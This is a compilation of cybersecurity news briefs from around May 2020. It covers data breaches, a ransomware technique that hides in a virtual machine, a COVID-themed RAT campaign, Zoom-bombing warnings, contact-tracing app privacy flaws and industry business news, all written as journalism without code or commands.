Jumbo disputes this assertion, claiming instead that users accessing the app via the iOS on their iPhone can be unmasked through the Identifier for Advertisers (IDFA) on their device. 

The IFDA is an ad-tracking device that enables an advertiser to understand when a phone user has taken an action like a click or an app install.

"They share the IDFA with Foursquare, which means it’s not anonymous,” said Jumbo Privacy CEO Pierre Valade. "It’s a unique ID tied to your phone.”

Foursquare confirmed in a statement that it receives Care19 data. However, the company said it promptly discards the information sent via the app and doesn't use it for anything. 

The Care19 privacy policy indicates that “Your data is identified by an anonymous code.” Jumbo found that, along with the IDFA, this anonymous code was transmitted to Foursquare. The code was also being sent, together with the name given to the phone by the user (e.g., Paul's phone), to remote logger Bugfender.

Businesses Could Face Influx of Attacks When Offices Reopen

Businesses Could Face Influx of Attacks When Offices Reopen

Cyber-criminals could be poised to trigger a wave of attacks on businesses when workers return to offices and reconnect to corporate networks, Redscan has warned. As many countries such as the UK prepare to ease COVID-19 lockdown restrictions and allow more people to return to physical workplaces, the cybersecurity firm said organizations need to take action to defend themselves against potential hackers lying dormant on employee devices.

There has been a substantial rise in threat activity over recent months, with cyber-criminals looking to exploit the sudden rise in remote working during the pandemic and the resultant lack of protection. In this period, Redscan has observed a surge in activity such as malspam, external scanning attempts to identify weaknesses in the use of remote access tools and account login attempts from unknown locations.

It therefore believes there could be an influx of attacks when staff reconnect to company networks after returning to their workplaces, with attackers ready to launch attacks including ransomware across a company network. In order to prevent this situation occurring, Redscan said firms should sanitize all endpoints on the return to the office as well as closely monitor networks for evidence of compromises.

George Glass, head of threat intelligence at Redscan, said: “During the COVID-19 pandemic there has been a steady stream of organizations reporting cyber-attacks. However, this is only likely to be the tip of the iceberg. Many more organizations are certain to have been targeted without their knowledge.

“As employees return to work post-lockdown and connect directly to corporate networks, organizations need to be alert to the possibility that criminals could be lying dormant on employee devices, waiting for the opportunity to move laterally through a network, escalate privileges and deploy ransomware.”

Redscan provided other recommendations to companies to tackle this type of threat, including updating anti-virus signatures, connecting all devices to remote networks and educating staff about the latest risks.

Data Breach Afflicts Ohio’s Unemployment Office

Data Breach Afflicts Ohio’s Unemployment Office

A data breach at the Ohio Department of Job and Family Services (ODJFS) has exposed the personal data of Pandemic Unemployment Assistance (PUA) claimants. 

Personal information including names, Social Security numbers, home addresses, and claim receipts was exposed to other claimants due to a security vulnerability detected by Deloitte Consulting on May 15. Deloitte is the technology vendor for PUA systems in several states, including Ohio. 

“A unique circumstance enabled about two dozen Pandemic Unemployment Assistance claimants to inadvertently access a restricted page when logged into the state’s PUA website,” Deloitte said in the statement.

In a breach notification email sent to PUA claimants on May 20, ODJFS said the breach was fixed within one hour of discovery. 

The department stated: “Over the weekend, Deloitte notified ODJFS that about two dozen individuals inadvertently had the capability to view other PUA claimants’ correspondence.” 

According to the department there is no evidence to suggest that any "widespread data compromise" had occurred. 

More than 161,000 Ohioans have applied for unemployment assistance offered in the wake of COVID-19. ODJFS has not revealed how many of these claimants were affected by the data breach. 

Perhaps tellingly, every single Ohioan who has claimed PUA is being offered free credit monitoring by Deloitte Consulting for 12 months.

“A unique circumstance enabled about two dozen Pandemic Unemployment Assistance claimants to inadvertently access a restricted page when logged into the state’s PUA website,” Deloitte said in the statement. "Within an hour of learning of this issue, we identified the cause and stopped the unauthorized access to prevent additional occurrences.

Frustrated claimants, some of whom are still waiting to receive financial assistance under the PUA program, reported the breach on social media. 

ODJFS said action had been taken to ensure that the data breach was a one-off.

The department stated: “ODJFS holds the confidentiality of claimant data in the highest regard and agreed with the immediate steps Deloitte took to prevent any unauthorized PUA access in the future."

Unemployment claims in Ohio since the start of the coronavirus crisis passed the 1 million mark at the end of April, putting pressure on an archaic system.

Non-Cybersecurity Incidents Outnumber Cyber-Attacks in ICO Report

Non-Cybersecurity Incidents Outnumber Cyber-Attacks in ICO Report

The Information Commissioner’s Office (ICO) has disclosed that reported non-cyber incidents outweighed cyber-incidents in Q4 of 2019.

In its report on incident trends, the ICO said there were 2629 incidents reported to it in Q4 2019, of which 337 were due to “data emailed to incorrect recipient,” 265 were due to “data posted or faxed to incorrect recipient” and 213 due to “loss/theft of paperwork or data left in insecure location.” Meanwhile, the main cyber-incidents were 280 as a result of phishing and 175 regarding unauthorized access. 

As a result, the ICO issued two fines. The first was £500,000 to DSG Retail Limited in January after a point of sale computer system was compromised as a result of a cyber-attack, affecting at least 14 million people. Also, in March, the ICO fined Cathay Pacific Airways Limited £500,000 for failing to protect the security of its customers’ personal data. Between October 2014 and May 2018 Cathay Pacific’s computer systems lacked appropriate security measures which led to customers’ personal details being exposed.

ZIVVER’s CEO and founder Rick Goud pointed out the number of reported data leaks decreases every quarter in the UK, while other countries like Germany, the Netherlands, Denmark and Sweden have shown more than 50% increases. “Per inhabitant, the UK was already reporting about 10-times less data leaks than the 'top'-countries,” he said. “This is not due to less data leaks, but – instead – due to a decrease in reporting culture, possibly prompted by the lack of action shown by the ICO since GDPR came into force.”

In an email to Infosecurity, BH Consulting CEO Brian Honan said the report reinforces the fact that most security breaches are not due to “sophisticated attackers” but are the result of failings in basic security controls.

He added: “Accidental data leakage is one of the key sources for breaches and these can result from the lack of appropriate training to staff on how to handle and process data, from weak security controls that don’t prevent or alert to breaches, or a combination of both.

“Ensuring staff are properly trained in the handling and processing of personal data, the technologies they use as part of their daily work and have effective security awareness training is crucial to preventing these type of errors.”

Honan also pointed out that the blame cannot be solely put down to human error, and we need to ensure our systems and platforms provide staff with a safety net in the event they make a mistake. “This means security professionals also need to ensure the basics are covered and that systems are properly patched, effective email security to protect against phishing attacks and data leakage are in place, and that data is encrypted at rest and in transit,” he said.

“It is also important to remember that no matter what controls are in place a breach can still happen and that staff and the company need to be prepared on how to deal with it and know when and how to report breaches to the ICO, or any other relevant Data Protection Supervisory Authorities or other regulatory bodies.”

RagnarLocker Ransomware Hides in Virtual Machine to Escape Detection

RagnarLocker Ransomware Hides in Virtual Machine to Escape Detection

Security researchers are warning of a new ransomware attack technique which deploys the malware as a virtual machine (VM) in order to evade traditional defenses.

Sophos revealed that it recently detected a RagnarLocker attack in which the ransomware was hidden inside an Oracle VirtualBox Windows XP VM.

It said the attack payload was a 122MB installer, with a 282MB virtual image inside concealing a 49KB executable.

“In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,” Sophos director of engineering, Mark Loman, explained.

The MSI package contained an Oracle VirtualBox hypervisor and a virtual disk image file (VDI) named micro.vdi, which was an image of a stripped-down version of the Windows XP SP3 operating system.

“Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviors can run unhindered, because they’re out of reach for security software on the physical host machine,” said Loman.

The attack appears to have been highly targeted, as the ransom note contained the victim’s name.

RagnarLocker has been in action recently, after it was deployed against Portuguese energy giant Energias de Portugal (EDP) group in an attack demanding a payment of €10m ($11m).

As Loman explained, the group behind the ransomware typically targets managed service providers (MSPs) and exploits holes in Windows Remote Desktop Protocol (RDP) to gain a foothold into organizations.

“After gaining administrator-level access to the domain of a target and exfiltration of data, they have used native Windows administrative tools such as Powershell and Windows Group Policy Objects (GPOs) to move laterally across the network to Windows clients and servers,” he said.

Japan Probes Theft of Hypersonic Missile Plans – Report

Japan Probes Theft of Hypersonic Missile Plans – Report

The Japanese government is investigating a potentially serious breach of national security after a cyber-attack on Mitsubishi Electric earlier this year which may have yielded top secret missile plans.

The tech giant said in a statement earlier this week that it reported an incident to the Defense Ministry in February, in which sensitive information including personal data on 8000 employees may have been stolen, according to AP.

Chief cabinet secretary Yoshihide Suga is said to have told reporters that the government is now investigating “the possible impact of the information leak on national security.”

The stolen data is thought to relate to a prototype missile that Mitsubishi was bidding to build. The firm didn’t win the bid but held sensitive documents related to the design as part of the process.

Russia, the US and China appear to be in an arms race to build these hypersonic glide vehicles (HGVs), which are said to combine the speed of a ballistic missile with the maneuvering capabilities of a cruise missile, making them incredibly difficult for conventional defense systems to track.

Given that the missiles were apparently intended to be deployed in Japan’s southern islands to ward of the threat from an increasingly assertive China, it would seem that Beijing-backed hackers are likely to be behind these latest cyber-espionage efforts.

It’s unclear whether the reported incident relates to one revealed by Mitsubishi Electric in January, which took place back in June 2019.

At the time reports suggested likely Chinese hackers had stolen 200MB of data from the firm.

However, Mitsubishi claimed that, although personal and corporate confidential information may have been taken, “sensitive information on social infrastructure such as defense, electric power and railways, highly confidential technical information, and important information concerning business partners has not been leaked."

Zoom Meetings Bombed with Child Sexual Abuse Material

Zoom Meetings Bombed with Child Sexual Abuse Material

The disruption of nearly 200 Zoom meetings with images of child sexual abuse has prompted the FBI to issue a warning.

In recent months, schools, councils, businesses, and the general public have been using the videoconferencing app to communicate after social distancing and lockdown measures introduced to slow the spread of COVID-19 made face-to-face interaction difficult.  

However, as the number of legitimate users has risen, so too has the number of Zoom-bombing incidents in which malicious users hack meetings to subject attendees to unwanted language and images. 

While some Zoom-bombings consist of little more than a schoolboy prank, others are seriously offensive, featuring lewd imagery, expletives, and racist language. According to the FBI, a growing number of these cyber-attacks now feature material depicting the sexual abuse of minors. 

"During the last few months, the FBI has received more than 195 reports of incidents throughout the United States and in other countries in which a Zoom participant was able to broadcast a video depicting child sexual abuse material (CSAM)," wrote the FBI in a statement released yesterday.

"The FBI considers this activity to be a violent crime, as every time child sexual abuse material is viewed, the depicted child is re-victimized. Furthermore, anyone who inadvertently sees child sexual abuse material depicted during a virtual event is potentially a victim as well."

The Bureau asked any Zoom hosts or administrators who have had a meeting disrupted by the broadcast of CSAM to contact the FBI and to keep a record of what occurred. 

The FBI warned Zoom users to consider the privacy of any videoconferences they schedule. 

"Links to many virtual events are being shared online, resulting in a lack of vetting of approved participants," said the FBI. "Do not make meetings or classrooms public. Do not share a link to a teleconference or classroom on an unrestricted, publicly available social media post. Provide the link directly to specific attendees." 

The Bureau advised users to make their Zoom meetings private either by requiring attendees to enter a meeting password or by using the waiting room feature to control the admittance of guests.

To limit the risk of abusive content being shown, hosts can change the screen-sharing options to "Host Only." 

Raytheon’s Board Takes Voluntary Pay Cut

Raytheon's Board Takes Voluntary Pay Cut

Raytheon Technologies’ board of directors is taking a voluntary pay cut as the United States continues to be impacted by COVID-19. 

The board has reduced non-employee director compensation by an amount equal to 20% of the director cash retainer. The pay cut will apply for the annual term ending at the 2021 Annual Meeting of Shareowners.

The defense giant, which is headquartered in Waltham, Massachusetts, announced the board's gesture on May 14. 

News of the resolution follows a decision by CEO Greg Hayes to institute a temporary 10% base pay reduction for all salaried employees across the company's Pratt & Whitney and Collins Aerospace Systems businesses as well as its corporate offices. 

Raytheon employs 195,000 people across four industry-leading businesses―Collins Aerospace Systems, Pratt & Whitney, Raytheon Intelligence & Space, and Raytheon Missiles & Defense. 

Temporary reductions in pay announced by Raytheon last month will go into effect from June and remain in place until the end of the year. 

Previously, CEO Greg Hayes and executive chairman Tom Kennedy had volunteered to slash their salaries by 20% for the same period.

In a statement released May 14, Raytheon said: "Raytheon Technologies continues to monitor the crisis and is responding as needed to ensure the wellbeing of its employees, customers and suppliers, while protecting the long-term financial strength of the business."

Raytheon Technologies Corporation was formed in 2020 through the combination of Raytheon Company and the United Technologies Corporation aerospace businesses. 

This week, the company confirmed that it is closing an office in Albuquerque, New Mexico, where 200 people are currently employed. 

Raytheon spokeswoman Heather Uberuaga said the company is seeking to streamline its capabilities and relocate support for key capabilities and customer programs to alternative facilities elsewhere in the United States.

"We think this move is in the best interest of our customers as we look to further integrate and streamline our capabilities with pursuits and programs located at other sites while working with employees on a case-by-case basis to explore their individual employment options going forward,” Uberuaga wrote in an email to the Albuquerque Journal.

Cybersecurity Company Sues Private Equity Firm for Backing Out of Buyout

Cybersecurity Company Sues Private Equity Firm for Backing Out of Buyout

Cybersecurity firm Forescout Technologies Inc. yesterday sued a private equity firm for backing out of a $1.9bn buyout.

Advent International Corporation agreed to buy Forescout back in February 2020, but four days before the takeover was due to be completed, the firm announced it would no longer be closing the deal. 

According to California company Forescout, Advent said it was reneging on the deal because of the impact of the global outbreak of COVID-19. 

The takeover had been scheduled to go ahead on Monday, May 18. On May 20, Forescout filed a lawsuit in the Delaware Court of Chancery requesting that Advent be ordered to complete the buyout.

In a statement released yesterday, Forescout accused Advent of violating the terms of their merger agreement.

A spokesperson for the aggrieved cybersecurity company said: "Advent’s purported excuse for its wrongful conduct is that a closing condition to the transaction has not been satisfied because a 'material adverse effect' has occurred at Forescout.

"Forescout believes that no material adverse effect has occurred, that all closing conditions are satisfied, and that Advent is obligated to close the transaction."

The cybersecurity company said that the effects of COVID-19 had been factored into negotiations and that Advent "has relied on meritless excuses" to wriggle out of the deal.

"The merger agreement explicitly allocated the risk of any impacts from COVID-19 to Advent," said Forescout.

Theresia Gouw, chair of the Forescout board, described Advent's getting cold feet over the planned buyout as highly disappointing. 

“The only change since the merger agreement was jointly executed in February is the deepening of the COVID-19 pandemic, which has significantly impacted global macro-economic conditions," said Gouw. 

"All companies have been challenged by this pandemic, and it is highly disappointing that Advent would attempt to exploit market volatility to renege on its contractual obligations, particularly when the merger agreement explicitly excludes the effects of a pandemic as a material adverse event."

The surprising turn of events sent Forescout's shares tumbling to an all-time low yesterday. Shares were at just $18.33 when trading opened. Advent International agreed on February 6 to pay $33 a share to take Forescout private.

Winnti Group Targets Video Game Developers with New Backdoor Malware

Winnti Group Targets Video Game Developers with New Backdoor Malware

Researchers from ESET have discovered a new modular backdoor used by the Winnti Group to target several video game companies that develop MMO (massively multiplayer online) games.

As explained in a blog post, the malware, dubbed ‘PipeMon’ by ESET, targeted companies in South Korea and Taiwan. The video games developed by these companies are distributed all around the world, are available on popular gaming platforms and have thousands of simultaneous players.

According to researchers, the new modular backdoor is signed with a code-signing certificate likely stolen during a previous campaign and shares similarities with the PortReuse backdoor.

In at least one case, the attackers compromised a company’s build orchestration server, allowing them to take control of the victim’s automated build systems. This could have allowed the attackers to Trojanize video game executables, although there’s no current evidence that has occurred. In another case, attackers compromised a company’s game servers. With this attack, it would be possible to manipulate in-game currencies for financial gain, ESET explained.

“Multiple indicators led us to attribute this campaign to the Winnti Group. Some of the command and control domains used by PipeMon were used by Winnti malware in previous campaigns,” said Mathieu Tartare, malware researcher at ESET. “Furthermore, in 2019, other Winnti malware was found at some of the same companies that were later discovered to be compromised with PipeMon in 2020.”

Flight Risk Employees Account for Most Insider Threats

Flight Risk Employees Account for Most Insider Threats

Employees or contractors identified as a “flight risk” are linked to 60% of insider threat cases, increasing the likelihood that such incidents will involve theft of sensitive corporate data, according to Securonix.

The vendor’s 2020 Securonix Insider Threat Report was distilled from over 300 real-life insider incidents across multiple sectors.

It revealed that over 80% of staff members deemed likely to terminate their employment will take data with them, anywhere between two weeks and two months prior to them leaving. Flight risk can be determined from web browsing and email behavior, Securonix said.

Unsurprisingly, therefore, data exfiltration is the number one insider threat, with email the most popular vector for data loss, followed by web uploads and cloud storage sites.

Account sharing and shadow IT, especially the prevalence of cloud collaboration tools, are compounding the problem for IT security operations teams, the report claimed.

“Data aggregation and snooping of sensitive data is still prominent in most organizations, however tools to detect such behavior still lag behind. This is primarily due to organizations struggling to classify data that is deemed sensitive, combined with data being vastly distributed across networks and systems,” it explained.

“The circumvention of IT controls is prevalent across all organizations. IT security operations teams, especially ones from large enterprises, are finding it difficult to draw conclusions about such incidents mostly due to lack of, or differences between, policies and procedures for each line of business.”

Pharmaceutical firms accounted for the largest number of data exfiltration incidents analyzed by Securonix, which is understandable considering the highly sensitive IP handled by these organizations.

Behavioral analytics were used most often to detect abnormal user behavior and flag violations.

However, data theft is only one of many risks posed by employees. Many of these stem from negligence rather than deliberate malice. Human error, including misconfiguration of cloud systems and misdelivery of emails, accounted for 22% of breaches analyzed by Verizon in its latest report.

IT Asset Management Forum Launches to Enhance Sector

IT Asset Management Forum Launches to Enhance Sector

A not-for-profit body for the asset management sector has been established to advance the overall reputation and recognition of the IT Asset ManagEment (ITAM) industry while providing a collaborative space for ITAM leaders to come together.

The ITAM Forum launches with a board of 15 trustees from across the ITAM industry – representing IT end users, resellers, tool providers and independent consultants, with two objectives:

  • To educate and evangelize – to encourage more companies to practice ITAM and to attract new professionals into the industry
  • To promote best practice – provide a collaborative, global forum for ITAM leaders to come together and share ideas for the advancement of the ITAM industry (eventually establishing a globally-recognized Organizational certification for ITAM)

Founder Martin Thompson said that with more focus on asset management, due to the COVID-19 pandemic driving more employees to work remotely, “IT Asset Managers have a huge role to play in documenting and unpicking this rapid and unplanned investment. 

“The smart management of assets is a shrewd business practice which delivers benefits far beyond IT. ITAM therefore has a rightful place outside of the niche IT/ITSM domain from where it started, and as a boardroom priority in its own right. The ITAM Forum is here to help it achieve this goal, by raising the profile of the ITAM discipline as much more than a compliance exercise and demonstrating its value to every organization looking to better manage its assets.”

In an email to Infosecurity, Lenny Zeltser, CISO of asset management vendor Axonius, said it was encouraging to see the increasing importance that cybersecurity professionals have been assigning to IT asset management in recent years.

“Security teams recognize that ITAM is a foundational aspect of a security program,” Zeltser said. “We need to know what devices, systems, users and applications we have, so we can implement the appropriate safeguards for them. Industry frameworks such as ISO 27001, CIS Critical Controls and NIST Cybersecurity Frameworks have included the need for ITAM for years. In recent years I've seen security professionals pay much closer attention to this requirement.”

Zeltser also noted that more and more enterprises are recognizing that they don't need yet another source of asset data, and instead look for ways to gather information about IT assets from the various IT data silos, such as the CMDB, network scanners, cloud instrumentation tools, Active Directory and so on. “Each of these sources of data has partial visibility into the organization's assets. By combining this data, organizations are able to get a comprehensive view into their ITAM posture.” 

The ITAM Forum also announced a longer term objective to create a new certification program for ITAM, based on the global ISO standard for the ITAM industry – ISO19770 – which was first published in 2006. 

“By certifying organizations against the ISO standard, the ITAM Forum will look to provide the highest measure of quality to demonstrate the competence of an ITAM department in the face of increasing board level scrutiny,” Thompson said.

“By benchmarking an ITAM department output against recognized ISO standards, stakeholders in the ITAM lifecycle (in particular those not fully versed in the complexity of IT assets) will be assured of quality. While our current priority is to establish the ITAM Forum as the credible voice of the ITAM industry, we look forward to eventually establishing the ITAM Forum certification as the globally-recognized ‘Kitemark’ for ITAM quality.”

Home Chef Breach May Affect Millions of Customers

Home Chef Breach May Affect Millions of Customers

Home Chef has confirmed a major breach of customers’ personal information, potentially affecting millions of users.

The Chicago-headquartered meal delivery service revealed in a notice on its website that email addresses, encrypted passwords, last four digits of credit card numbers and “other account information such as frequency of deliveries and mailing address” were among the compromised details.

“We are taking action to investigate this situation and to strengthen our information security defenses to prevent similar incidents from happening in the future,” it said.

Although passwords were scrambled, the firm urged customers to reset their credentials anyway. Its encryption of passwords and only partial storage of credit card details will limit the risk exposure to customers, but other personal details could be used to craft convincing phishing attacks spoofing the brand.

“You should also remain vigilant against phishing attacks and monitor your accounts for any suspicious activity,” said Home Chef. “Remember that we will never ask you to send sensitive information over email, and you can make any necessary changes to your accounts by logging into your account directly on our website.”

Although the firm claimed that only “select customer information” was taken, a dark web trader claims to have as many as eight million records up for sale.

Boris Cipot, senior security engineer at Synopsys, argued that even Home Chef’s efforts to minimize risk exposure may be undone.

"Passwords — even encrypted passwords — can be cracked. If a hacker succeeds in accessing password data, it could be a key element in carrying out additional attacks. When we add email addresses to those cracked passwords, attackers may now be able to enter other services such as bank accounts, e-commerce sites, among many others,” he argued.

“With regards to the last four digits of your credit card number, if you believe this is useless data without the full number, think again. Some services require you to only enter the last four numbers to confirm your identity. As such this data can be of use to attackers with the knowledge of how to make the most of such information."

Microsoft Warns of “Massive” #COVID19 RAT

Microsoft Warns of “Massive” #COVID19 RAT

Microsoft is warning of a major new COVID-19 phishing campaign using malicious Excel macros to achieve remote access of victims’ machines via a legitimate support tool.

Microsoft Security Intelligence revealed the news in a series of tweets, claiming the campaign began on May 12.

“The emails purport to come from Johns Hopkins Center bearing ‘WHO COVID-19 SITUATION REPORT.’ The Excel files open w/ security warning & show a graph of supposed coronavirus cases in the US. If allowed to run, the malicious Excel 4.0 macro downloads & runs NetSupport Manager RAT,” it explained.

“For several months now, we’ve been seeing a steady increase in the use of malicious Excel 4.0 macros in malware campaigns. In April, these Excel 4.0 campaigns jumped on the bandwagon and started using COVID-19 themed lures.”

In this respect, the campaign is similar to many others that have been launched over recent weeks and months, with cyber-criminals effectively rebranding existing content with COVID-19 themes to increase success rates.

Google claimed it has been blocking over 240 million COVID-themed spam messages each day, and 18 million malware and phishing emails.

“The hundreds of unique Excel files in this campaign use highly obfuscated formulas, but all of them connect to the same URL to download the payload. NetSupport Manager is known for being abused by attackers to gain remote access to and run commands on compromised machines,” Microsoft said of the latest RAT campaign.

“The NetSupport RAT used in this campaign further drops multiple components, including several .dll, .ini, and other .exe files, a VBScript, and an obfuscated PowerSploit-based PowerShell script. It connects to a C2 server, allowing attackers to send further commands.”

In the UK, these kinds of emails should be reported to the National Cyber Security Centre’s Suspicious Email Reporting Service, but this first requires the presence-of-mind to do so from employees.

“The advice for organizations and employees is to remain vigilant to this new kind of threat, and to deploy training as regularly as possible to make sure individuals remain aware,” advised DomainTools malware researcher, Tarik Saleh. “Phishing is at its core an attack on people, and people remain the best defense against it, in addition to ensuring proper processes remain in place.”

Michigan Launches Cybercrime Hotline

Michigan Launches Cybercrime Hotline

Michigan victims of cybercrime now have a dedicated phone line to call for free round-the-clock support and advice. 

The Cybercrime Victim Support Initiative is available free of charge to residents in 13 northern Michigan counties, including Antrim, Benzie, Grand Traverse, Kalkaska, and Leelanau. 

Residents who have been targeted by cyber-criminals can call or text 211 from any phone to report the crime and receive tips on how to recover their personal information and funds. 

Calls will be handled by a center in Grand Rapids staffed by trained advisors from United Way, an organization that brings donors, volunteers, and community organizations together to solve critical problems.

In addition to offering practical guidance on what to do after a crime has taken place, the advisors will offer tips on how to avoid being caught in the cyber-criminal's net.

Data collected by the advisors will be stored in a central database and used to warn Michigan residents of all the latest scams doing the rounds. 

Seth Johnson, president of the United Way of Northwest Michigan, said that while most people are aware of old scams like the phishing email that appears to be sent by a Nigerian prince, some of the newer nefarious schemes, including ruses to con Americans out of their COVID-19 stimulus checks, are not common knowledge. 

"More and more of us are online and so more and more of us are vulnerable," Johnson said. 

As cybercrime grows ever more sophisticated, the hotline has been established as a place to which residents can turn for clear and reliable guidance. 

Johnson said: "This is meant to be a 24/7 resource where they can get the information they need." 

The initiative was launched by the Cybercrime Support Network and Heart of West Michigan United Way in partnership with the Heart of Florida United Way. Funding for the hotline was provided via a Department of Justice Office for Victims of Crime Vision 21 Grant. 

Leelanau County Sheriff Mike Borkovich said the hotline is a valuable resource for victims of cybercrime. 

Borkovich, who has seen an increase in the number of reported cybercrime incidents since the outbreak of COVID-19, said: "People have no scruples when it comes to things like that. They'll take advantage of senior citizens and try to rip them off."

Boston Cybersecurity Firm to Create 65 Jobs in Belfast

Boston Cybersecurity Firm to Create 65 Jobs in Belfast

Boston cybersecurity firm Cygilant has announced plans to create 65 jobs at its new European security operations center (SOC) in Northern Ireland's capital city, Belfast. 

Cygilant, which employs 80 people globally, established the SOC in February 2020 with the support of Invest NI, the economic development agency for Northern Ireland. 

Already, 25 employees have been recruited to work at the new center, which is based in the Centrepoint Building next to the BBC on Ormeau Avenue. Now the company has pledged to create a further 40 jobs at the center over the next couple of years, with wages averaging around £43,000.

While lockdown measures introduced to slow the spread of COVID-19 in Northern Ireland remain in place, the SOC is being operated on a remote basis. 

But despite the difficulties created by the outbreak of the novel coronavirus, Cygilant's chief executive Rob Scott said that around ten new staff had been recruited for the center since lockdown measures were imposed. 

Invest NI has offered Cygilant a generous £455,000 in funding toward the creation of new jobs in Northern Ireland. 

Former Formula 1 race-car driver Scott said the investment played a key part in the company's decision to site their European operations in the Emerald Isle. 

The Mancunian and lifelong Manchester United Football Club fan explained: “Opening this SOC is our first foray into the European market and thanks to the support of Invest NI, we made the decision to invest here in Belfast.”

Scott also cited Belfast's local talent as a determining factor. He said: “There are between 18 and 20 cybersecurity companies, so it’s becoming a major hub for that technology. It’s because there’s already a pool of people and on top of that, there are the universities, which have great cyber-security programs.”

Economy Minister Diane Dodds said that the 65 jobs created by the US company will eventually contribute £2.8m in annual salaries.

“In these challenging times it is welcome news to be able to announce new cybersecurity jobs for Northern Ireland," Dodds told The Irish News.

“This is an important endorsement of Northern Ireland’s growing reputation for excellence in cybersecurity.”

Stanford University Tops List of US Cybersecurity Degree Providers

Stanford University Tops List of US Cybersecurity Degree Providers

The cybersecurity degree offered by Stanford University has been ranked the best in the United States by independent educational organization Cyber Degrees Edu.

Private California university Stanford topped a list of America's 55 best cybersecurity degree providers published by Cyber Degrees Edu on May 18. In second and third place respectively were Carnegie Mellon University in Pennsylvania and the University of California, Davis

Of the three top degree providers, Stanford has the lowest student-to-faculty ratio with 5 students to every 1 faculty member. At Carnegie Mellon, the ratio doubles to 10 to 1, while at the University of California, Davis, the ratio is an even higher 20 to 1. 

A proprietary ratings system was used to rank the various colleges and universities offering cybersecurity bachelor’s and master’s degree programs. 

The criteria used to determine the rankings included the school’s rates of acceptance and graduation. Researchers also compared educational establishments by their retention rate, which is the number of first-time students who return to the university the following year.

Stanford boasts the highest graduation rate with 94% of students leaving the university with a degree. At Carnegie Mellon, the rate is slightly lower at 89%, while at University of California, Davis, 86% of students graduate. 

Researchers also looked at the costs of studying, the grants and scholarships available, and which colleges specialized in cybersecurity with a variety of degree programs.

"All schools on the list are either high quality or very affordable and are located across the country," said a spokesperson for Cyber Degrees Edu. "While the list provides some of the best schools for cybersecurity, Cyber Degrees EDU also recognizes that it is important for students to find the best school for their particular needs and so these rankings aim to provide the information needed for students to make the best possible choice for them."

When weighing up which degree provider was best, researchers looked beyond the school's overall reputation to its alumni.

Cyber Degrees Edu said: "What matters most is the reputation of the individual cybersecurity program. That is why knowing which schools were attended by the best cybersecurity professionals is so vital."

NHS Contact Tracing App Security Issues Detailed

NHS Contact Tracing App Security Issues Detailed

New security issues have been discovered in the UK Government’s NHS contact tracing app, as well as a potential data breach.

The app is currently being trialed on the Isle of Wight and privacy issues have been raised, which the National Cyber Security Centre (NCSC) told BBC News it was already aware of and is in the process of addressing. Raised by researchers Dr Chris Culnane and Vanessa Teague, the main issues include:

  • In the presence of an untrusted TLS server, the registration process does not properly guarantee either the integrity of the authority public key or the privacy of the shared secrets established at registration. The result completely undermines core security goals of the protocol, including its privacy and its resistance to spoofing and manipulation
  • In the presence of an untrusted TLS server, the storing and transmitting of unencrypted interaction logs facilitates the recovery of InstallationIDs without requiring access to the Authority Private Key
  • Long lived BroadcastValues undermine BLE specified privacy protections and could reveal additional lifestyle attributes about a user who submits their data
  • The monitoring of interactions at eight second intervals could create unique interaction signatures that could be used to pairwise match device interactions, and when combined with unencrypted submission, allow the recovery of InstallationID from BroadcastValue without access to the Authority Private Key
  • The use of a deterministic counter to trigger KeepAlive updates risks creating an identifier that could be used to link BroadcastValues over multiple days

The researchers praised the “cryptographic protocol of the UK’s app [that] includes a much better effort at mitigation of most external attacks” and said there are admirable aspects of the implementation and the open availability of the source code.

“However, the messaging around the app, and in particular suggestions of broadening the data collected, combined with insufficient legislative protections, a lack of siloing of the data and no sunsetting of the data retention or usage, risk undermining the trust that has been earned,” they added.

The number of risks were varied, Culnane told BBC News, explaining that, terms of the registration issues, “it's fairly low risk because it would require an attack against a well protected server, which we don't think is particularly likely.” However, he did warn that the risk surrounding the unencrypted data is higher, “because if someone was to get access to your phone, then they might be able to learn some additional information because of what is stored on that.”

David Grout, CTO for EMEA at FireEye, said: “The mounting security concerns and doubts attached to the trailed NHS app are stemming from registration issues and the use of unencrypted data within the app which can be exploited by cyber-criminals. One of the biggest concerns is attached to the fact it’s based on a ‘centralized’ model.

“Just yesterday, France defended its own centralized model where contact-matching happens via a computer service, as opposed to the decentralized model which uses the people’s phone to make the match. The UK Government will need to address these safeguarding issues ahead of the full nation roll-out, so citizens are fully confident that their data is not compromised but stored securely.”

The research came as Serco apologized after an employee accidentally shared the email addresses of almost 300 contact tracers when they were cc’d (rather than bcc’d) in an email to inform new trainees about training details.

Also, a group of civil society organizations, privacy advocates and academic researchers have written an open letter to Health Secretary Matt Hancock, asking questions about the contact tracing data store.

Signed by the likes of the Open Rights Group, Big Brother Watch, Privacy International and Liberty, they urged Hancock to “provide the public with more information and take appropriate measures to reduce the risk of data sharing and keep the aggregated data under democratic control.”

Online Retailers Brace for #COVID19 Fraud Surge

Online Retailers Brace for #COVID19 Fraud Surge

Most UK retailers are expecting a surge in online fraud due to the current COVID-19 pandemic, with many customers having already experienced account takeover (ATO) attacks, according to Riskified.

The fraud-screening firm polled 1000 consumers and over 120 e-commerce professionals to better understand their challenges during the current crisis.

It found that a fifth (20%) of customers have suffered an account takeover attack over the past year. This is often done via phishing or credential stuffing, where reused logins are tried over numerous accounts and sites simultaneously by fraudsters.

Once inside, they could steal personal information and card details stored in the account, use it to fraudulently pay for goods, or sell access to the account on the dark web.

Despite the significant numbers of customers already affected, and the fact that 52% of retailers think fraud will increase during the pandemic, over a quarter (26%) admitted to having no measures in place to tackle ATO.

This is a concern, not just because of the extra fraud losses it could incur but also in terms of the long-term customer relationships. More than half (51%) of respondents said they’d stop shopping with a retailer if they suffered ATO and a similar number claimed they’d delete their account. Over a third (37%) would go to a competitor.

Part of the problem is that detecting ATO is difficult because the attacker effectively looks like a legitimate customer. This might account for the fact that just 4% of consumers that suffered ATO learned their accounts were compromised from the retailer.

Riskified warned that mandating two-factor authentication or long-and-strong passwords for improved account security would cause extra friction that may put shoppers off.

Instead, retailers need systems that can check for things like device and network details, proxy usage and previous logins as well as subsequent purchasing behavior, it said.

UK e-commerce fraud losses on cards are said to have topped £359 million last year, but fraud often rises during recessions.

African Fraud Gang Files for Millions in #COVID19 Payments

African Fraud Gang Files for Millions in #COVID19 Payments

A notorious West African BEC gang may have made millions defrauding the US government out of COVID-19 business compensation payments, according to Agari.

